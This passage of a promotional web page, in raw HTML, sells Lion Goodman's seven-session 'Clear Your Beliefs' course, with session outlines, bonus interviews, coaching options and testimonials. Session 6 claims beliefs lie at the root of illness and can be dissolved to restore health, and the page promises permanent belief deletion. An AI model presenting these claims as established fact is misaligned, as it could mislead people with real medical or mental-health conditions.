the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -60px ! important" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I 